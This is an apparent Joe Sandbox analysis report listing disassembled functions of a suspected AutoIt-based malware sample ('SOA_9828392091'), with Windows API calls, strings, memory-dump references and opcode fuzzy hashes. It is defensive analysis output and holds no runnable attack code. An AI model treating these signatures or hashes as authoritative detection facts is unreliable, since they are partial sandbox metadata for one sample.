                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: __snwprintf
                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                      • API String ID: 2391506597-2584243854
                                      • Opcode ID: f8cad7848d4b7bf63ed7b49d4036099f3265d363e323fac953a3acf290a4d44e
                                      • Instruction ID: 14eacb6aac4759e25f6c9cf0fc1bc33517a3bc02f9024c7973eb8f4e502c15ce
                                      • Opcode Fuzzy Hash: f8cad7848d4b7bf63ed7b49d4036099f3265d363e323fac953a3acf290a4d44e
                                      • Instruction Fuzzy Hash: 05216F71A00259ABCF11EFA5D882FAD77B4AF89704F004459F515AB281DB70EE45CFA1
                                      Function 009993CF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0099945C
                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00999467
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Combobox
                                      • API String ID: 3850602802-2096851135
                                      • Opcode ID: 8892be370be747bdcba05e97cc48d9237c4f6e19f14d8902cc7f561b6c08c3d6
                                      • Instruction ID: 5aea2e56a5e1d7e769f3679ecaefb9a1bbf5233b4a48bfb8909db561263eba0d
                                      • Opcode Fuzzy Hash: 8892be370be747bdcba05e97cc48d9237c4f6e19f14d8902cc7f561b6c08c3d6
                                      • Instruction Fuzzy Hash: 51118271310218AFEF26DF5CDC81EBB376FEB983A4F104129F919972A0D6719C529760
                                      Function 009998FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0094D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0094D1BA
                                        • Part of subcall function 0094D17C: GetStockObject.GDI32(00000011), ref: 0094D1CE
                                        • Part of subcall function 0094D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0094D1D8
                                      • GetWindowRect.USER32(00000000,?), ref: 00999968
                                      • GetSysColor.USER32(00000012), ref: 00999982
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                      • String ID: static
                                      • API String ID: 1983116058-2160076837
                                      • Opcode ID: 9b9b0d323c78ae45ae6634d565f1a7e7ec7b1b0937d6002924795d568c9f5e15
                                      • Instruction ID: f9724ffb69e8a0aa186cfbcc92d92fde25dbddedef590b166c65f6742f31ca60
                                      • Opcode Fuzzy Hash: 9b9b0d323c78ae45ae6634d565f1a7e7ec7b1b0937d6002924795d568c9f5e15
                                      • Instruction Fuzzy Hash: 90112672520209AFDF04DFB8CC45AEA7BA8FB48354F01462CFD55E2250E735E850DB60
                                      Function 00999617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowTextLengthW.USER32(00000000), ref: 00999699
                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 009996A8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: LengthMessageSendTextWindow
                                      • String ID: edit
                                      • API String ID: 2978978980-2167791130
                                      • Opcode ID: 2365dbd8b924620ff06f075ff4671cb20269f970c8f52b340ed60c1a0d296c87
                                      • Instruction ID: 3f8a2f7c5d5c257c8c8055445e474e417ef44b47892f5eb064d1e0c52c4f4872
                                      • Opcode Fuzzy Hash: 2365dbd8b924620ff06f075ff4671cb20269f970c8f52b340ed60c1a0d296c87
                                      • Instruction Fuzzy Hash: 1D119A71510108AAEF108F6CDC40EEB3B6EEB05378F100728F965931E0C7369C50A760
                                      Function 00975262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _memset.LIBCMT ref: 009752D5
                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 009752F4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: InfoItemMenu_memset
                                      • String ID: 0
                                      • API String ID: 2223754486-4108050209
                                      • Opcode ID: 745340878b8095b8114ba195028f1e35819153089b27815a394e4fdba92dfaff
                                      • Instruction ID: 03c01d05aaeec70c59e375d04bc1d2aab0b4de353cfd8f656e710ba124af8c15
                                      • Opcode Fuzzy Hash: 745340878b8095b8114ba195028f1e35819153089b27815a394e4fdba92dfaff
                                      • Instruction Fuzzy Hash: 6411D073A01614EBDBA0DA98D904BAD77BDAB45790F068125E91DA72A0E3F0AD04C790
                                      Function 00984D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00984DF5
                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00984E1E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Internet$OpenOption
                                      • String ID: <local>
                                      • API String ID: 942729171-4266983199
                                      • Opcode ID: 684087cba1379733c6230152dbdc7594bc9964db57f9831603f56a77434cb355
                                      • Instruction ID: 4ddff201e1d3a90abb79d6d873427ab8000f5991db4b155fd8ef9ab1eac38a4a
                                      • Opcode Fuzzy Hash: 684087cba1379733c6230152dbdc7594bc9964db57f9831603f56a77434cb355
                                      • Instruction Fuzzy Hash: 59119EB1501222BADB259F51C888EEBFAACFF06755F10862AF50596280E6746940D7E0
                                      Function 0098A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: htonsinet_addr
                                      • String ID: 255.255.255.255
                                      • API String ID: 3832099526-2422070025
                                      • Opcode ID: 98c3e73466f6cc04dc20d57ce6655a897ba76ff67465dda2cf629183ec2842c1
                                      • Instruction ID: c5d8b49496e8e9ccc4154c1ca3239fb06b7dc55b6f39594163b974297e3132a2
                                      • Opcode Fuzzy Hash: 98c3e73466f6cc04dc20d57ce6655a897ba76ff67465dda2cf629183ec2842c1
                                      • Instruction Fuzzy Hash: D301F9B5200305ABDB21EF64C886FADB368EF44320F108527F516973D1D771E801C762
                                      Function 0096B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0096B7EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: 8c8550fa9e5a09c50ef3b67fb0e35f3a89e8d5b4484e54e00900845378fa5c73
                                      • Instruction ID: e1c44f8785466582d9be77bd34f80b4e20f78d647cc818944cd943f60aaf5b0e
                                      • Opcode Fuzzy Hash: 8c8550fa9e5a09c50ef3b67fb0e35f3a89e8d5b4484e54e00900845378fa5c73
                                      • Instruction Fuzzy Hash: 7501D4B1A41118ABCB04EBA4CC52AFE737DBF95350B04062DF472A72D2EB745D08CB90
                                      Function 0096B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 0096B6EB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: 482243f18d7b44f3315ec8d80e015b3dcd5d41f73049826976c06d9435bed94a
                                      • Instruction ID: 0e29491cce278c2c2855fe5c8164e01dd8620700750d2e33fdf8be6329bfbdc8
                                      • Opcode Fuzzy Hash: 482243f18d7b44f3315ec8d80e015b3dcd5d41f73049826976c06d9435bed94a
                                      • Instruction Fuzzy Hash: 71016DB1A41108ABCB15EBA4C962BFE73BD9F85354F100029B502B32D2EB545E189BB5
                                      Function 0096B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 0096B76C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: ComboBox$ListBox
                                      • API String ID: 3850602802-1403004172
                                      • Opcode ID: 34d137b700de6ec357c42103cd60f830bc9ab0a3b66d98fc2eecc2fd93cf0dd4
                                      • Instruction ID: 743c13c2328db9188a31a553fe160f038507e5255d65a7fc550e99fd93705dcd
                                      • Opcode Fuzzy Hash: 34d137b700de6ec357c42103cd60f830bc9ab0a3b66d98fc2eecc2fd93cf0dd4
                                      • Instruction Fuzzy Hash: 8401D1B2A41108ABCB01EBA4CA12FFE73AC9B85344F100029B402F31D2EB645F099BB5
                                      Function 00977744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: ClassName_wcscmp
                                      • String ID: #32770
                                      • API String ID: 2292705959-463685578
                                      • Opcode ID: e9cb81fa07ff0b9c16abcb122f94434398699d77f32f72bd0d42496889c1a671
                                      • Instruction ID: bfc7f6ff1133c1be771ab9c0cc197dac86b1b748d50ea3a8a34a248a715b81d8
                                      • Opcode Fuzzy Hash: e9cb81fa07ff0b9c16abcb122f94434398699d77f32f72bd0d42496889c1a671
                                      • Instruction Fuzzy Hash: B1E0927760422567D710EAA6DC0AF9BFBACAB91B64F004156B905D3041E670AA4587D4
                                      Function 0096A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0096A63F
                                        • Part of subcall function 009513F1: _doexit.LIBCMT ref: 009513FB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: Message_doexit
                                      • String ID: AutoIt$Error allocating memory.
                                      • API String ID: 1993061046-4017498283
                                      • Opcode ID: 50821222b4dce17091f4ec170d7a12efd0f4f841041206fa084fcd60eb675405
                                      • Instruction ID: cd6fcdc8bc08646c8cf38e528f1520915649a371565192c4f25a7739117b6f36
                                      • Opcode Fuzzy Hash: 50821222b4dce17091f4ec170d7a12efd0f4f841041206fa084fcd60eb675405
                                      • Instruction Fuzzy Hash: EFD02B313C531833C21436996D17FC8364CCB84B65F040025BB08950C349E6894002DA
                                      Function 009AAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(?), ref: 009AACC0
                                      • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 009AAEBD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: DirectoryFreeLibrarySystem
                                      • String ID: WIN_XPe
                                      • API String ID: 510247158-3257408948
                                      • Opcode ID: 27e31bd88bf5c58d805a86514fa66c2fe419d03a512e6839232946b1b47f4347
                                      • Instruction ID: 5350aee7c2768fc15d0b58f4b27749b49f52e3c0c6c9be76a28a54c6e15333b3
                                      • Opcode Fuzzy Hash: 27e31bd88bf5c58d805a86514fa66c2fe419d03a512e6839232946b1b47f4347
                                      • Instruction Fuzzy Hash: C8E09B70C15149DFDB15DFA5DD44AECF7BCAB49310F108181E052B2260D7344A44DF21
                                      Function 00998698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009986A2
                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 009986B5
                                        • Part of subcall function 00977A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00977AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: d171127bf59a31eb0cf5051dfe45d6b7e21e372f7e041ea6e31addac8d8eb28d
                                      • Instruction ID: c30882a6a344f4208ad884329c18c738f25d32e66119bb4280e39282028d384f
                                      • Opcode Fuzzy Hash: d171127bf59a31eb0cf5051dfe45d6b7e21e372f7e041ea6e31addac8d8eb28d
                                      • Instruction Fuzzy Hash: 03D0A932399314B7E22863709C0BFC66A089B40B20F000914B609AA1C0C8E0A9008A10
                                      Function 009986CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 009986E2
                                      • PostMessageW.USER32(00000000), ref: 009986E9
                                        • Part of subcall function 00977A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00977AD0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2124662965.0000000000931000.00000040.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                      • Associated: 00000000.00000002.2124645397.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.00000000009EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124662965.0000000000A4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124815352.0000000000A55000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2124833707.0000000000A57000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_930000_SOA_9828392091.jbxd
                                      Similarity
                                      • API ID: FindMessagePostSleepWindow
                                      • String ID: Shell_TrayWnd
                                      • API String ID: 529655941-2988720461
                                      • Opcode ID: ff8c0a13e003e3868fd0e276dd6f4e12754e4e1dab940b59ab18fc21be73f61c
                                      • Instruction ID: 9662cc973363f3bc0653123d42edaf321bbc07691787e3b4a728f7c4a16b43fb
                                      • Opcode Fuzzy Hash: ff8c0a13e003e3868fd0e276dd6f4e12754e4e1dab940b59ab18fc21be73f61c
                                      • Instruction Fuzzy Hash: 70D0A93238A314BBF22963709C0BFC66A089B44B20F000914B609AA1C0C8E0A9008A14